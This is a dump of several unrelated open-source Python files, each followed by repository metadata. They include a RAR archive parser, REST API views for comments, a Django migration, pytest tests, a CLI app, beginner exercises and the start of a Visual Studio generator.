yield TimeDateMSDOS32(s, "ftime", "Date and time (MS DOS format)")
yield textHandler(UInt8(s, "version", "RAR version needed to extract file"), formatRARVersion)
yield Enum(UInt8(s, "method", "Packing method"), COMPRESSION_NAME)
yield filesizeHandler(UInt16(s, "filename_length", "File name size"))
if s["host_os"].value in (OS_MSDOS, OS_WIN32):
yield MSDOSFileAttr32(s, "file_attr", "File attributes")
else:
yield textHandler(UInt32(s, "file_attr", "File attributes"), hexadecimal)
# Start additional field from unrar
if s["flags/is_large"].value:
yield filesizeHandler(UInt64(s, "large_size", "Extended 64bits filesize"))
# End additional field
size = s["filename_length"].value
if size > 0:
if s["flags/is_unicode"].value:
charset = "UTF-8"
else:
charset = "ISO-8859-15"
yield String(s, "filename", size, "Filename", charset=charset)
# Start additional fields from unrar - file only
if is_file:
if s["flags/has_salt"].value:
yield RawBytes(s, "salt", 8, "Encryption salt to increase security")
if s["flags/has_ext_time"].value:
yield ExtTime(s, "extra_time")
def fileHeader(s):
return specialHeader(s, True)
def fileBody(s):
# File compressed data
size = s["compressed_size"].value
if s["flags/is_large"].value:
size += s["large_size"].value
if size > 0:
yield RawBytes(s, "compressed_data", size, "File compressed data")
def fileDescription(tag):
def _fileDescription(s):
return "%s: %s (%s)" % \
(tag, s["filename"].display, s["compressed_size"].display)
return _fileDescription
def newSubHeader(s):
return specialHeader(s, False)
class EndFlags(StaticFieldSet):
format = (
(Bit, "has_next_vol", "Whether there is another next volume"),
(Bit, "has_data_crc", "Whether a CRC value is present"),
(Bit, "rev_space"),
(Bit, "has_vol_number", "Whether the volume number is present"),
(NullBits, "unused[]", 10),
) + commonFlags
def endFlags(s):
yield EndFlags(s, "flags", "End block flags")
class BlockFlags(StaticFieldSet):
static_size = 16
format = (
(NullBits, "unused[]", 14),
) + commonFlags
class Block(FieldSet):
BLOCK_INFO = {
# None means 'use default function'
0x72: ("marker", "File format marker", markerFlags, None, None),
0x73: ("archive_start", "Archive info", archiveFlags, archiveHeader, None),
0x74: ("file[]", fileDescription("File entry"), fileFlags, fileHeader, fileBody),
0x75: ("comment[]", "Comment", None, commentHeader, commentBody),
0x76: ("av_info[]", "Extra information", None, avInfoHeader, avInfoBody),
0x77: ("sub_block[]", fileDescription("Subblock"), None, newSubHeader, fileBody),
0x78: ("recovery[]", "Recovery block", None, recoveryHeader, None),
0x79: ("signature", "Signature block", None, signatureHeader, None),
0x7A: ("sub_block[]", fileDescription("New-format subblock"), fileFlags,
newSubHeader, fileBody),
0x7B: ("archive_end", "Archive end block", endFlags, None, None),
}
def __init__(self, parent, name):
FieldSet.__init__(self, parent, name)
t = self["block_type"].value
if t in self.BLOCK_INFO:
self._name, desc, parseFlags, parseHeader, parseBody = self.BLOCK_INFO[t]
if callable(desc):
self.createDescription = lambda: desc(self)
elif desc:
self._description = desc
if parseFlags : self.parseFlags = lambda: parseFlags(self)
if parseHeader : self.parseHeader = lambda: parseHeader(self)
if parseBody : self.parseBody = lambda: parseBody(self)
else:
self.info("Processing as unknown block block of type %u" % type)
self._size = 8*self["block_size"].value
if t == 0x74 or t == 0x7A:
self._size += 8*self["compressed_size"].value
if "is_large" in self["flags"] and self["flags/is_large"].value:
self._size += 8*self["large_size"].value
elif "has_added_size" in self:
self._size += 8*self["added_size"].value
# TODO: check if any other member is needed here
def createFields(self):
yield textHandler(UInt16(self, "crc16", "Block CRC16"), hexadecimal)
yield textHandler(UInt8(self, "block_type", "Block type"), hexadecimal)
# Parse flags
for field in self.parseFlags():
yield field
# Get block size
yield filesizeHandler(UInt16(self, "block_size", "Block size"))
# Parse remaining header
for field in self.parseHeader():
yield field
# Finish header with stuff of unknow size
size = self["block_size"].value - (self.current_size//8)
if size > 0:
yield RawBytes(self, "unknown", size, "Unknow data (UInt32 probably)")
# Parse body
for field in self.parseBody():
yield field
def createDescription(self):
return "Block entry: %s" % self["type"].display
def parseFlags(self):
yield BlockFlags(self, "flags", "Block header flags")
def parseHeader(self):
if "has_added_size" in self["flags"] and \
self["flags/has_added_size"].value:
yield filesizeHandler(UInt32(self, "added_size",
"Supplementary block size"))
def parseBody(self):
"""
Parse what is left of the block
"""
size = self["block_size"].value - (self.current_size//8)
if "has_added_size" in self["flags"] and self["flags/has_added_size"].value:
size += self["added_size"].value
if size > 0:
yield RawBytes(self, "body", size, "Body data")
class RarFile(Parser):
MAGIC = "Rar!\x1A\x07\x00"
PARSER_TAGS = {
"id": "rar",
"category": "archive",
"file_ext": ("rar",),
"mime": (u"application/x-rar-compressed", ),
"min_size": 7*8,
"magic": ((MAGIC, 0),),
"description": "Roshal archive (RAR)",
}
endian = LITTLE_ENDIAN
def validate(self):
magic = self.MAGIC
if self.stream.readBytes(0, len(magic)) != magic:
return "Invalid magic"
return True
def createFields(self):
while not self.eof:
yield Block(self, "block[]")
def createContentSize(self):
start = 0
end = MAX_FILESIZE * 8
pos = self.stream.searchBytes("\xC4\x3D\x7B\x00\x40\x07\x00", start, end)
if pos is not None:
return pos + 7*8
return None
|
kreatorkodi/repository.torrentbr
|
plugin.video.yatp/site-packages/hachoir_parser/archive/rar.py
|
Python
|
gpl-2.0
| 14,384 | 0.005284 |
# -*- coding:utf-8 -*-
import copy
from zope.interface import implementer
from .interfaces import (
IExecutor,
ISchemaValidation,
IDataValidation,
ICreate,
IDelete,
IEdit
)
from alchemyjsonschema.dictify import (
normalize,
validate_all,
ErrorFound
)
from jsonschema import FormatChecker
from jsonschema.validators import Draft4Validator
class ValidationError(Exception):
pass
@implementer(IExecutor)
class Executor(object):
def __init__(self, context, params):
self.context = context
self.raw_params = params
self.params = None
def validation(self, ob=None):
raise NotImplemented
def execute(self, ob=None):
raise NotImplemented
def default_validation(self, iface, ob=None, name=""):
fn = self.context.customized_or_default(iface, ISchemaValidation, name=name)
params = fn(self.context, self.raw_params)
fn2 = self.context.customized_or_default(iface, IDataValidation, name=name)
fn2(self.context, params, ob)
return params
class CreateExecutor(Executor):
def validation(self, ob=None):
self.params = default_validation(self, ICreate, ob)
def execute(self, ob=None):
if self.params is None:
raise RuntimeError("execute after validation")
ob = self.context.modelclass(**self.params)
self.context.session.add(ob)
self.context.session.flush()
return ob
class EditExecutor(Executor):
def validation(self, ob=None):
self.params = default_validation(self, IEdit, ob)
def execute(self, ob):
if self.params is None:
raise RuntimeError("execute after validation")
for k, v in self.params.items():
setattr(ob, k, v)
self.context.session.add(ob)
return ob
class DeleteExecutor(Executor):
def validation(self, ob=None):
self.params = default_validation(self, IDelete, ob)
def execute(self, ob):
self.context.session.delete(ob)
return ob
def create_jsonschema_validation(context, params, ob=None):
def customize_schema(schema):
schema = copy.deepcopy(schema)
# when creating model, id is not needed.
if "id" in schema["required"]:
schema["required"].remove("id")
if "id" in schema["properties"]:
schema["properties"].pop("id")
return schema
schema = customize_schema(context.schema)
schema_validator = Draft4Validator(schema, format_checker=FormatChecker())
try:
validate_all(params, schema_validator)
except ErrorFound as err:
raise ValidationError({e.path[0]: e.message for e in err.errors})
return normalize(params, schema)
def edit_jsonschema_validation(context, params):
schema = context.schema
schema_validator = Draft4Validator(schema, format_checker=FormatChecker())
try:
validate_all(params, schema_validator)
except ErrorFound as err:
raise ValidationError({e.path[0]: e.message for e in err.errors})
return normalize(params, schema)
def delete_jsonschema_validation(context, params):
return params
|
podhmo/komet
|
komet/executors.py
|
Python
|
mit
| 3,149 | 0.000318 |
# -*- coding: utf-8 -*-
# Copyright © 2014-2016 Digital Catapult and The Copyright Hub Foundation
# (together the Open Permissions Platform Coalition)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""API Roles handler. Allows to create and modify roles
"""
from koi import auth
from perch import Token, User
from tornado.gen import coroutine
from .base import BaseHandler
class RolesHandler(BaseHandler):
"""Responsible for managing role resources
"""
@auth.auth_required(Token.valid)
@coroutine
def get(self):
"""Get all roles"""
roles = {x.value for x in User.roles}
result = [{'id': x, 'name': x.title()} for x in roles]
self.finish({
'status': 200,
'data': result
})
|
openpermissions/accounts-srv
|
accounts/controllers/roles_handler.py
|
Python
|
gpl-3.0
| 1,354 | 0 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-07-05 10:03
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0003_auto_20170705_0958'),
]
operations = [
migrations.RenameField(
model_name='oauthtoken',
old_name='renew_token',
new_name='refresh_token',
),
migrations.RenameField(
model_name='oauthtoken',
old_name='renew_token_expiration',
new_name='refresh_token_expiration',
),
]
|
BdEINSALyon/resa
|
account/migrations/0004_auto_20170705_1003.py
|
Python
|
gpl-3.0
| 620 | 0 |
import logging
import sys
from cliff.app import App
from cliff.commandmanager import CommandManager
# from .utils import ColorLogFormatter
from nicelog.formatters import ColorLineFormatter
class HarvesterApp(App):
logger = logging.getLogger(__name__)
def __init__(self):
super(HarvesterApp, self).__init__(
description='Harvester application CLI',
version='0.1',
command_manager=CommandManager('harvester.commands'))
def configure_logging(self):
"""
Create logging handlers for any log output.
Modified version to set custom formatter for console
"""
root_logger = logging.getLogger('')
root_logger.setLevel(logging.DEBUG)
# Set up logging to a file
if self.options.log_file:
file_handler = logging.FileHandler(
filename=self.options.log_file,
)
formatter = logging.Formatter(self.LOG_FILE_MESSAGE_FORMAT)
file_handler.setFormatter(formatter)
root_logger.addHandler(file_handler)
# Always send higher-level messages to the console via stderr
console = logging.StreamHandler(self.stderr)
console_level = {0: logging.WARNING,
1: logging.INFO,
2: logging.DEBUG,
}.get(self.options.verbose_level, logging.DEBUG)
console.setLevel(console_level)
# formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT)
formatter = ColorLineFormatter(
show_date=True, show_function=True, show_filename=True)
console.setFormatter(formatter)
root_logger.addHandler(console)
return
def main(argv=sys.argv[1:]):
myapp = HarvesterApp()
return myapp.run(argv)
if __name__ == '__main__':
sys.exit(main())
|
opendatatrentino/opendata-harvester
|
harvester/cli.py
|
Python
|
bsd-2-clause
| 1,858 | 0 |
# -*- coding: utf-8 -*- vim:fileencoding=utf-8:
# vim: tabstop=4:shiftwidth=4:softtabstop=4:expandtab
# Copyright © 2010-2012 Greek Research and Technology Network (GRNET S.A.)
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF
# USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
# TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
'''
Module containing dummy implementations of django management commands
Idea is to be able to use it for unit tests and as a reference
'''
def power_on(hostname, username, password, **kwargs):
'''
Power on command
'''
return True
def power_off(hostname, username, password, **kwargs):
'''
Power off command
'''
return True
def power_off_acpi(hostname, username, password, **kwargs):
'''
Power off using ACPI command
'''
return True
def power_cycle(hostname, username, password, **kwargs):
'''
Cold boot command
'''
return True
def power_reset(hostname, username, password, **kwargs):
'''
Warm boot command
'''
return True
def pass_change(hostname, username, password, **kwargs):
'''
Change BMC password
'''
return True
def set_settings(hostname, username, password, **kwargs):
'''
Set BMC settings
'''
return True
def set_ldap_settings(hostname, username, password, **kwargs):
'''
Set BMC LDAP settings
'''
return True
def boot_order(hostname, username, password, **kwargs):
'''
Set boot order
'''
return True
def license_set(hostname, username, password, **kwargs):
'''
Set BMC License
'''
return True
def bmc_reset(hostname, username, password, **kwargs):
'''
Reset BMC
'''
return True
def bmc_factory_defaults(hostname, username, password, **kwargs):
'''
Reset BMC to factory defaults
'''
return True
def add_user(hostname, username, password, **kwargs):
'''
Add a user to the BMC
'''
return True
def remove_user(hostname, username, password, **kwargs):
'''
Remove a User from the BMC
'''
return True
def get_all_users(hostname, username, password, **kwargs):
'''
Get a list of all configured users on the BMC
'''
return True
def firmware_update(hostname, username, password, **kwargs):
'''
Performs a firmware update of the BMC
'''
return True
|
apoikos/servermon
|
hwdoc/vendor/dummy.py
|
Python
|
isc
| 2,909 | 0.005846 |
hiddenimports = ['decimal']
|
ryandoherty/RaceCapture_App
|
install/hooks/hook-autosportlabs.racecapture.views.configuration.rcp.scriptview.py
|
Python
|
gpl-3.0
| 28 | 0 |
#Problem 1:
#Python provides a built-in function called len that returns the length of a string
#so the value of len('allen') is 5.
#Write a function named right_justify that takes a string named s as a parameter and prints
#the string with enough leading spaces so that the last letter of the string is in column 70
#of the display.
#word = raw_input('Type a word to send over there ---->\n')
def right_justify(word):
print " " * (70 - len(word)) + word
#right_justify(word)
#Problem 2:
#1. Type this example into a script and test it:
#def do_twice(f):
#f()
#f()
#2. Modify do_twice so that it takes two arguments, a function object and a value,
#and calls the function twice, passing the value as an argument.
#3. Write a more general version of print_spam, called print_twice, that takes a
#string as a parameter and prints it twice.
#4. Use the modified version of do_twice to call print_twice twice, passing 'spam'
#as an argument.
#5. Define a new function called do_four that takes a function object and a value
#and calls the function four times, passing the value as a parameter. There should
#be only two statements in the body of this function, not four.
word = raw_input('Type a word to repeat\n')
string = raw_input('Type something here\n')
def do_twice(f, word):
print_twice('spam')
print_twice('spam')
def print_spam(word):
print word
def print_twice(string):
print string
print string
def do_four(f, word):
do_twice(string, word)
do_twice(string, word)
do_four(print_twice, 'spam')
print ''
|
hollylemos/think-python
|
chapter-03/3.py
|
Python
|
mit
| 1,541 | 0.035042 |
import pytest
from punch import vcs_configuration as vc
@pytest.fixture
def global_variables():
return {
'serializer': '{{ major }}.{{ minor }}.{{ patch }}',
'mark': 'just a mark'
}
@pytest.fixture
def vcs_config_dict():
return {
'name': 'git',
'commit_message': "Version updated to {{ new_version }}",
'finish_release': True,
'options': {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
}
}
@pytest.fixture
def vcs_config_dict_with_include_files(vcs_config_dict):
vcs_config_dict['include_files'] = ['HISTORY.rst']
return vcs_config_dict
@pytest.fixture
def vcs_config_dict_with_include_all_files(vcs_config_dict):
vcs_config_dict['include_all_files'] = True
return vcs_config_dict
@pytest.fixture
def special_variables():
return {
'current_version': '1.2.3',
'new_version': '1.3.0'
}
def test_vcs_configuration_from_string(
vcs_config_dict, global_variables, special_variables):
vcsconf = vc.VCSConfiguration(vcs_config_dict['name'],
vcs_config_dict['options'],
global_variables,
special_variables,
vcs_config_dict['commit_message']
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated to 1.3.0"
assert vcsconf.include_files == []
assert vcsconf.finish_release is True
assert vcsconf.options == expected_options
def test_vcs_configuration_from_string_with_include_files(
vcs_config_dict_with_include_files,
global_variables, special_variables):
vcsconf = vc.VCSConfiguration(
vcs_config_dict_with_include_files['name'],
vcs_config_dict_with_include_files['options'],
global_variables,
special_variables,
vcs_config_dict_with_include_files['commit_message'],
include_files=vcs_config_dict_with_include_files['include_files']
)
assert vcsconf.include_files == ['HISTORY.rst']
def test_vcs_configuration_from_string_with_include_all_files(
vcs_config_dict_with_include_all_files,
global_variables, special_variables):
vcsconf = vc.VCSConfiguration(
vcs_config_dict_with_include_all_files['name'],
vcs_config_dict_with_include_all_files['options'],
global_variables,
special_variables,
vcs_config_dict_with_include_all_files['commit_message'],
include_all_files=vcs_config_dict_with_include_all_files[
'include_all_files']
)
assert vcsconf.include_all_files is True
def test_vcs_configuration_from_dict(
vcs_config_dict, global_variables, special_variables):
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated to 1.3.0"
assert vcsconf.include_files == []
assert vcsconf.finish_release is True
assert vcsconf.options == expected_options
def test_vcs_configuration_from_dict_with_include_files(
vcs_config_dict_with_include_files,
global_variables, special_variables):
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict_with_include_files,
global_variables,
special_variables
)
assert vcsconf.include_files == ['HISTORY.rst']
def test_vcs_configuration_from_dict_with_include_all_files(
vcs_config_dict_with_include_all_files,
global_variables, special_variables):
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict_with_include_all_files,
global_variables,
special_variables
)
assert vcsconf.include_all_files is True
def test_vcs_configuration_from_dict_without_commit_message(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict.pop('commit_message')
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated 1.2.3 -> 1.3.0"
assert vcsconf.include_files == []
assert vcsconf.finish_release is True
assert vcsconf.options == expected_options
def test_vcs_configuration_from_dict_without_finish_release(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict.pop('finish_release')
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated to 1.3.0"
assert vcsconf.include_files == []
assert vcsconf.finish_release is True
assert vcsconf.options == expected_options
def test_vcs_configuration_from_dict_without_options(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict.pop('options')
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated to 1.3.0"
assert vcsconf.finish_release is True
def test_vcs_configuration_from_dict_can_use_global_variables(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict['commit_message'] = "Mark: {{ mark }}"
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
assert vcsconf.commit_message == "Mark: just a mark"
def test_vcs_configuration_from_dict_special_variables_take_precedence(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict['commit_message'] = "{{ current_version }}"
global_variables['current_version'] = "5.0.0"
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
assert vcsconf.commit_message == "1.2.3"
def test_vcs_configuration_from_dict_options_templates_are_processed(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict['options']['annotation_message'] = \
"Updated {{ current_version}} -> {{ new_version }}"
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': 'Updated 1.2.3 -> 1.3.0',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.options == expected_options
|
lgiordani/punch
|
tests/test_vcs_configuration.py
|
Python
|
isc
| 7,655 | 0 |
from django.conf.urls.defaults import patterns # noqa
from django.conf.urls.defaults import url # noqa
from openstack_dashboard.dashboards.fogbow.usage import views
from openstack_dashboard.dashboards.fogbow.usage.views import IndexView
urlpatterns = patterns('',
url(r'^$', IndexView.as_view(), name='index'),
url(r'^(?P<member_id>.*)/usage$', views.getSpecificMemberUsage, name='usage'),
)
|
fogbow/fogbow-dashboard
|
openstack_dashboard/dashboards/fogbow/usage/urls.py
|
Python
|
apache-2.0
| 404 | 0.00495 |
from rest_framework import generics, permissions as drf_permissions
from rest_framework.exceptions import NotFound, ValidationError, PermissionDenied
from modularodm import Q
from modularodm.exceptions import NoResultsFound
from api.base.exceptions import Gone
from api.base import permissions as base_permissions
from api.base.views import JSONAPIBaseView
from api.comments.permissions import (
CommentDetailPermissions,
CommentReportsPermissions
)
from api.comments.serializers import (
CommentSerializer,
CommentDetailSerializer,
CommentReportSerializer,
CommentReportDetailSerializer,
CommentReport
)
from framework.auth.core import Auth
from framework.auth.oauth_scopes import CoreScopes
from framework.exceptions import PermissionsError
from website.project.model import Comment
class CommentMixin(object):
"""Mixin with convenience methods for retrieving the current comment based on the
current URL. By default, fetches the comment based on the comment_id kwarg.
"""
serializer_class = CommentSerializer
comment_lookup_url_kwarg = 'comment_id'
def get_comment(self, check_permissions=True):
pk = self.kwargs[self.comment_lookup_url_kwarg]
try:
comment = Comment.find_one(Q('_id', 'eq', pk) & Q('root_target', 'ne', None))
except NoResultsFound:
raise NotFound
# Deleted root targets still appear as tuples in the database and are included in
# the above query, requiring an additional check
if comment.root_target.referent.is_deleted:
comment.root_target = None
comment.save()
if comment.root_target is None:
raise NotFound
if check_permissions:
# May raise a permission denied
self.check_object_permissions(self.request, comment)
return comment
class CommentDetail(JSONAPIBaseView, generics.RetrieveUpdateDestroyAPIView, CommentMixin):
"""Details about a specific comment. *Writeable*.
###Permissions
Comments on public nodes are given read-only access to everyone. Comments on private nodes are only visible
to contributors and administrators on the parent node. Only the user who created the comment has permission
to edit and delete the comment.
Note that if an anonymous view_only key is being used, the user relationship will not be exposed.
##Attributes
OSF comment entities have the "comments" `type`.
name type description
=================================================================================
content string content of the comment
date_created iso8601 timestamp timestamp that the comment was created
date_modified iso8601 timestamp timestamp when the comment was last updated
modified boolean has this comment been edited?
deleted boolean is this comment deleted?
is_abuse boolean has this comment been reported by the current user?
has_children boolean does this comment have replies?
can_edit boolean can the current user edit this comment?
##Relationships
###User
The user who created the comment.
###Node
The project associated with this comment.
###Target
The "parent" of the comment. If the comment was made on a node, the target is the node. If the comment
is a reply, its target is the comment it was in reply to.
###Replies
List of replies to this comment. New replies can be created through this endpoint.
###Reports
List of spam reports for this comment. Only users with permission to create comments can
access this endpoint, and users can only see reports that they have created.
##Links
self: the canonical api endpoint of this comment
##Actions
###Update
Method: PUT / PATCH
URL: /links/self
Query Params: <none>
Body (JSON): {
"data": {
"type": "comments", # required
"id": {comment_id}, # required
"attributes": {
"content": {content}, # mandatory
"deleted": {is_deleted}, # mandatory
}
}
}
Success: 200 OK + comment representation
To update a comment, issue either a PUT or a PATCH request against the `/links/self` URL. The `content`
and `deleted` fields are mandatory if you PUT and optional if you PATCH. Non-string values will be accepted and
stringified, but we make no promises about the stringification output. So don't do that.
To restore a deleted comment, issue a PATCH request against the `/links/self` URL, with `deleted: False`.
###Delete
Method: DELETE
URL: /links/self
Query Params: <none>
Success: 204 No Content
To delete a comment send a DELETE request to the `/links/self` URL. Nothing will be returned in the response
body. Attempting to delete an already deleted comment will result in a 400 Bad Request response.
##Query Params
*None*.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
CommentDetailPermissions,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.NODE_COMMENTS_READ]
required_write_scopes = [CoreScopes.NODE_COMMENTS_WRITE]
serializer_class = CommentDetailSerializer
view_category = 'comments'
view_name = 'comment-detail'
# overrides RetrieveAPIView
def get_object(self):
return self.get_comment()
def perform_destroy(self, instance):
auth = Auth(self.request.user)
if instance.is_deleted:
raise ValidationError('Comment already deleted.')
else:
try:
instance.delete(auth, save=True)
except PermissionsError:
raise PermissionDenied('Not authorized to delete this comment.')
class CommentReportsList(JSONAPIBaseView, generics.ListCreateAPIView, CommentMixin):
"""List of reports made for a comment. *Writeable*.
Paginated list of reports for a comment. Each resource contains the full representation of the
report, meaning additional requests to an individual comment's report detail view are not necessary.
###Permissions
The comment reports endpoint can only be viewed by users with permission to comment on the node. Users
are only shown comment reports that they have made.
##Attributes
OSF comment report entities have the "comment_reports" `type`.
name type description
=====================================================================================
category string the type of spam, must be one of the allowed values
message string description of why the comment was reported
##Links
See the [JSON-API spec regarding pagination](http://jsonapi.org/format/1.0/#fetching-pagination).
##Actions
###Create
Method: POST
URL: /links/self
Query Params: <none>
Body (JSON): {
"data": {
"type": "comment_reports", # required
"attributes": {
"category": {category}, # mandatory
"message": {text}, # optional
}
}
}
Success: 201 CREATED + comment report representation
To create a report for this comment, issue a POST request against this endpoint. The `category` field is mandatory,
and must be one of the following: "spam", "hate" or "violence" . The `message` field is optional. If the comment
report creation is successful the API will return a 201 response with the representation of the new comment report
in the body. For the new comment report's canonical URL, see the `/links/self` field of the response.
##Query Params
*None*.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticated,
CommentReportsPermissions,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.COMMENT_REPORTS_READ]
required_write_scopes = [CoreScopes.COMMENT_REPORTS_WRITE]
serializer_class = CommentReportSerializer
view_category = 'comments'
view_name = 'comment-reports'
def get_queryset(self):
user_id = self.request.user._id
comment = self.get_comment()
reports = comment.reports
serialized_reports = []
if user_id in reports:
report = CommentReport(user_id, reports[user_id]['category'], reports[user_id]['text'])
serialized_reports.append(report)
return serialized_reports
class CommentReportDetail(JSONAPIBaseView, generics.RetrieveUpdateDestroyAPIView, CommentMixin):
"""Details about a specific comment report. *Writeable*.
###Permissions
A comment report detail can only be viewed, edited and removed by the user who created the report.
##Attributes
OSF comment report entities have the "comment_reports" `type`.
name type description
=====================================================================================
category string the type of spam, must be one of the allowed values
message string description of why the comment was reported
##Links
self: the canonical api endpoint of this comment report
##Actions
###Update
Method: PUT / PATCH
URL: /links/self
Query Params: <none>
Body (JSON): {
"data": {
"type": "comment_reports", # required
"id": {user_id}, # required
"attributes": {
"category": {category}, # mandatory
"message": {text}, # optional
}
}
}
Success: 200 OK + comment report representation
To update a report for this comment, issue a PUT/PATCH request against this endpoint. The `category` field is
mandatory for a PUT request and must be one of the following: "spam", "hate" or "violence". The `message` field
is optional. Non-string values will be accepted and stringified, but we make no promises about the stringification
output. So don't do that.
###Delete
Method: DELETE
URL: /links/self
Query Params: <none>
Success: 204 + No content
To delete a comment report, issue a DELETE request against `/links/self`. A successful delete will return a
204 No Content response.
##Query Params
*None*.
#This Request/Response
"""
permission_classes = (
drf_permissions.IsAuthenticated,
CommentReportsPermissions,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.COMMENT_REPORTS_READ]
required_write_scopes = [CoreScopes.COMMENT_REPORTS_WRITE]
serializer_class = CommentReportDetailSerializer
view_category = 'comments'
view_name = 'report-detail'
# overrides RetrieveUpdateDestroyAPIView
def get_object(self):
comment = self.get_comment()
reports = comment.reports
user_id = self.request.user._id
reporter_id = self.kwargs['user_id']
if reporter_id != user_id:
raise PermissionDenied("Not authorized to comment on this project.")
if reporter_id in reports:
return CommentReport(user_id, reports[user_id]['category'], reports[user_id]['text'])
else:
raise Gone(detail='The requested comment report is no longer available.')
# overrides RetrieveUpdateDestroyAPIView
def perform_destroy(self, instance):
user = self.request.user
comment = self.get_comment()
try:
comment.retract_report(user, save=True)
except ValueError as error:
raise ValidationError(error.message)
|
asanfilippo7/osf.io
|
api/comments/views.py
|
Python
|
apache-2.0
| 12,700 | 0.003622 |
from vsg.vhdlFile.extract import tokens
def get_n_token_after_tokens(iToken, lTokens, lAllTokens, oTokenMap):
lReturn = []
lIndexes = []
for oToken in lTokens:
lTemp = oTokenMap.get_token_indexes(oToken)
for iTemp in lTemp:
iTokenIndex = iTemp
for iCount in range(0, iToken):
iTokenIndex = oTokenMap.get_index_of_next_non_whitespace_token(iTokenIndex, bExcludeComments=True)
lIndexes.append(iTokenIndex)
lIndexes.sort()
for iIndex in lIndexes:
iLine = oTokenMap.get_line_number_of_index(iIndex)
lReturn.append(tokens.New(iIndex, iLine, [lAllTokens[iIndex]]))
return lReturn
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/vhdlFile/extract/get_n_token_after_tokens.py
|
Python
|
gpl-3.0
| 688 | 0.001453 |
#!/usr/bin/env python3
number = 23
guess = int(input('Enter an integer : '))
if guess == number:
# 新块从这里开始
print('Congratulations, you guessed it.')
print('(but you do not win any pizzas!)')
# 新块在这里结束
elif guess < number:
# 另一代码块
print('No, it is a little higher than that')
# 你可以在此做任何你希望在该代码块内进行的事情
else:
print('No, it is a little lower than that')
# 你必须通过猜测一个大于(>)设置数的数字来到达这里
print('Done')
# 这最后一句语句将在
# if 语句执行完毕后执行。
|
pam-phy/python-notes
|
byte-of-python/if.py
|
Python
|
gpl-2.0
| 600 | 0.020833 |
import os
import re
from conans.model import Generator
from conans.paths import BUILD_INFO_VISUAL_STUDIO
from conans.client.tools.files import VALID_LIB_EXTENSIONS
class VisualStudioGenerator(Generator):
template = '''<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ImportGroup Label="PropertySheets" />
<PropertyGroup Label="UserMacros" />
<PropertyGroup Label="Conan-RootDirs">{item_properties}
</PropertyGroup>
{properties}
<ItemGroup />
</Project>'''
properties_template = '''<PropertyGroup Label="ConanVariables"{condition}>
<ConanPackageName>{conan_package_name}</ConanPackageName>
<ConanPackageVersion>{conan_package_version}</ConanPackageVersion>
<ConanCompilerFlags>{compiler_flags}</ConanCompilerFlags>
<ConanLinkerFlags>{linker_flags}</ConanLinkerFlags>
